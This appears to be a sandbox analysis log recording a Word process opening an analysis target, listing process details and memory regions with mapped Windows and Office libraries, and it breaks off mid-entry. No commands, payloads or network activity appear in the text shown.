# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 11.08.2022 16:34:02.082 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\office16\\winword.exe" page_root = "0x307c000" os_pid = "0x130c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 259 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 260 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 261 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 262 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 263 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 264 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 265 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 266 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 267 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 268 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 269 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 270 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 271 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 272 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 273 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 274 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 275 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 276 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 277 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 278 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 279 start_va = 0x770000 end_va = 0x771fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 280 start_va = 0x780000 end_va = 0x781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 281 start_va = 0x790000 end_va = 0x791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 282 start_va = 0x7a0000 end_va = 0x7a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 283 start_va = 0x7b0000 end_va = 0x7b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 284 start_va = 0x7c0000 end_va = 0x7c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 285 start_va = 0x7d0000 end_va = 0x7dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 286 start_va = 0x7e0000 end_va = 0x7eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 287 start_va = 0x7f0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 288 start_va = 0x810000 end_va = 0x8b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\1033\\wwintl.dll") Region: id = 289 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 290 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 291 start_va = 0xa60000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 292 start_va = 0xbf0000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 293 start_va = 0xc00000 end_va = 0xc03fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 294 start_va = 0xc10000 end_va = 0xc4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 295 start_va = 0xc60000 end_va = 0xc60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 296 start_va = 0xc70000 end_va = 0xc70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 297 start_va = 0xc80000 end_va = 0xe57fff monitored = 0 entry_point = 0xc81000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe") Region: id = 298 start_va = 0xe60000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 299 start_va = 0x2260000 end_va = 0x2418fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 300 start_va = 0x24c0000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 301 start_va = 0x2500000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 302 start_va = 0x2510000 end_va = 0x2817fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 303 start_va = 0x2820000 end_va = 0x3140fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 304 start_va = 0x3150000 end_va = 0x7f8efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 305 start_va = 0x7f90000 end_va = 0x8104fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 306 start_va = 0x8110000 end_va = 0x820ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008110000" filename = "" Region: id = 307 start_va = 0x82c0000 end_va = 0x85f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 308 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 309 start_va = 0x8700000 end_va = 0x872dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008700000" filename = "" Region: id = 310 start_va = 0x8730000 end_va = 0x8730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 311 start_va = 0x8740000 end_va = 0x877ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 312 start_va = 0x8780000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 313 start_va = 0x8880000 end_va = 0x897ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 314 start_va = 0x8980000 end_va = 0x8980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 315 start_va = 0x8990000 end_va = 0x8990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 316 start_va = 0x89a0000 end_va = 0x89dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089a0000" filename = "" Region: id = 317 start_va = 0x89e0000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 318 start_va = 0x8ae0000 end_va = 0x8b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ae0000" filename = "" Region: id = 319 start_va = 0x8b20000 end_va = 0x8c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b20000" filename = "" Region: id = 320 start_va = 0x8c20000 end_va = 0x8c68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 321 start_va = 0x8c70000 end_va = 0x8d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c70000" filename = "" Region: id = 322 start_va = 0x8d70000 end_va = 0x956ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 323 start_va = 0x9570000 end_va = 0x996ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 324 start_va = 0x9970000 end_va = 0x9a2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009970000" filename = "" Region: id = 325 start_va = 0x9a30000 end_va = 0x9a33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a30000" filename = "" Region: id = 326 start_va = 0x9a40000 end_va = 0x9f31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a40000" filename = "" Region: id = 327 start_va = 0x9f40000 end_va = 0x9f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 328 start_va = 0x9f50000 end_va = 0x9f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 329 start_va = 0x9f60000 end_va = 0x9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 330 start_va = 0x9fa0000 end_va = 0xa09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 331 start_va = 0xa0a0000 end_va = 0xa0a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a0a0000" filename = "" Region: id = 332 start_va = 0xa0b0000 end_va = 0xa0effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0b0000" filename = "" Region: id = 333 start_va = 0xa0f0000 end_va = 0xa1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0f0000" filename = "" Region: id = 334 start_va = 0xa1f0000 end_va = 0xa1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 335 start_va = 0xa200000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 336 start_va = 0xa240000 end_va = 0xa33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a240000" filename = "" Region: id = 337 start_va = 0xa340000 end_va = 0xa37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a340000" filename = "" Region: id = 338 start_va = 0xa380000 end_va = 0xa383fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a380000" filename = "" Region: id = 339 start_va = 0xa390000 end_va = 0xa39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a390000" filename = "" Region: id = 340 start_va = 0xa3a0000 end_va = 0xa3a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a3a0000" filename = "" Region: id = 341 start_va = 0xa3b0000 end_va = 0xa3b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a3b0000" filename = "" Region: id = 342 start_va = 0xa3c0000 end_va = 0xa3c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 343 start_va = 0xa3d0000 end_va = 0xa3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3d0000" filename = "" Region: id = 344 start_va = 0xa3e0000 end_va = 0xa4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a3e0000" filename = "" Region: id = 345 start_va = 0xa4e0000 end_va = 0xacdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a4e0000" filename = "" Region: id = 346 start_va = 0xace0000 end_va = 0xad1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ace0000" filename = "" Region: id = 347 start_va = 0xad20000 end_va = 0xae1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad20000" filename = "" Region: id = 348 start_va = 0xae20000 end_va = 0xae5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae20000" filename = "" Region: id = 349 start_va = 0xae60000 end_va = 0xaf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae60000" filename = "" Region: id = 350 start_va = 0xaf60000 end_va = 0xaf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af60000" filename = "" Region: id = 351 start_va = 0xafa0000 end_va = 0xb09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afa0000" filename = "" Region: id = 352 start_va = 0xb0a0000 end_va = 0xb0dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0a0000" filename = "" Region: id = 353 start_va = 0xb0e0000 end_va = 0xb1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0e0000" filename = "" Region: id = 354 start_va = 0xb1e0000 end_va = 0xb1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1e0000" filename = "" Region: id = 355 start_va = 0xb1f0000 end_va = 0xb3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1f0000" filename = "" Region: id = 356 start_va = 0xb3f0000 end_va = 0xb46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3f0000" filename = "" Region: id = 357 start_va = 0xb470000 end_va = 0xb470fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 358 start_va = 0xb480000 end_va = 0xb493fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 359 start_va = 0xb4a0000 end_va = 0xb4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b4a0000" filename = "" Region: id = 360 start_va = 0xb4b0000 end_va = 0xb58ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 361 start_va = 0xb590000 end_va = 0xb593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b590000" filename = "" Region: id = 362 start_va = 0xb5a0000 end_va = 0xb5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5a0000" filename = "" Region: id = 363 start_va = 0xb5b0000 end_va = 0xb5b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5b0000" filename = "" Region: id = 364 start_va = 0xb5c0000 end_va = 0xc5bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 365 start_va = 0xc5c0000 end_va = 0xc69efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 366 start_va = 0xc6a0000 end_va = 0xca9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c6a0000" filename = "" Region: id = 367 start_va = 0xcbe0000 end_va = 0xcc21fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 368 start_va = 0xcc30000 end_va = 0xcc31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc30000" filename = "" Region: id = 369 start_va = 0xcc40000 end_va = 0xcd15fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cc40000" filename = "" Region: id = 370 start_va = 0xcd20000 end_va = 0xcdf5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd20000" filename = "" Region: id = 371 start_va = 0xce00000 end_va = 0xce1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce00000" filename = "" Region: id = 372 start_va = 0xce20000 end_va = 0xce3efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce20000" filename = "" Region: id = 373 start_va = 0xd120000 end_va = 0xd12ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d120000" filename = "" Region: id = 374 start_va = 0xd130000 end_va = 0xd13ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d130000" filename = "" Region: id = 375 start_va = 0xd140000 end_va = 0xd14ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d140000" filename = "" Region: id = 376 start_va = 0xd150000 end_va = 0xd556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d150000" filename = "" Region: id = 377 start_va = 0xd560000 end_va = 0xd963fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d560000" filename = "" Region: id = 378 start_va = 0xd970000 end_va = 0xdd7afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d970000" filename = "" Region: id = 379 start_va = 0xdd90000 end_va = 0xde0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd90000" filename = "" Region: id = 380 start_va = 0xde10000 end_va = 0xde20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 381 start_va = 0xde30000 end_va = 0xde30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000de30000" filename = "" Region: id = 382 start_va = 0xde40000 end_va = 0xee7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 383 start_va = 0xee80000 end_va = 0xf35dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ee80000" filename = "" Region: id = 384 start_va = 0x34400000 end_va = 0x3440ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034400000" filename = "" Region: id = 385 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 386 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 387 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 388 start_va = 0x693b0000 end_va = 0x693d2fff monitored = 0 entry_point = 0x693c69b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 389 start_va = 0x693e0000 end_va = 0x69431fff monitored = 0 entry_point = 0x69408290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 390 start_va = 0x69440000 end_va = 0x69571fff monitored = 0 entry_point = 0x694abf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 391 start_va = 0x69580000 end_va = 0x69595fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 392 start_va = 0x695a0000 end_va = 0x695c0fff monitored = 0 entry_point = 0x695abdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 393 start_va = 0x695d0000 end_va = 0x69dc4fff monitored = 0 entry_point = 0x69635279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\chart.dll") Region: id = 394 start_va = 0x69dd0000 end_va = 0x69e62fff monitored = 0 entry_point = 0x69df0ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 395 start_va = 0x69e70000 end_va = 0x6a05efff monitored = 0 entry_point = 0x69eb5e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 396 start_va = 0x6a060000 end_va = 0x6a0c6fff monitored = 0 entry_point = 0x6a075a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 397 start_va = 0x6a0d0000 end_va = 0x6a0d8fff monitored = 0 entry_point = 0x6a0d3830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 398 start_va = 0x6a0e0000 end_va = 0x6a113fff monitored = 0 entry_point = 0x6a0f8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 399 start_va = 0x6a120000 end_va = 0x6a2c1fff monitored = 0 entry_point = 0x6a121000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 400 start_va = 0x6a2d0000 end_va = 0x6a2d7fff monitored = 0 entry_point = 0x6a2d17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 401 start_va = 0x6a2e0000 end_va = 0x6a35cfff monitored = 0 entry_point = 0x6a2f0db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 402 start_va = 0x6a360000 end_va = 0x6a3b8fff monitored = 0 entry_point = 0x6a370780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 403 start_va = 0x6a3c0000 end_va = 0x6a532fff monitored = 0 entry_point = 0x6a46d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 404 start_va = 0x6a540000 end_va = 0x6a59bfff monitored = 0 entry_point = 0x6a548880 region_type = mapped_file name = "d3d10_1core.dll" filename = 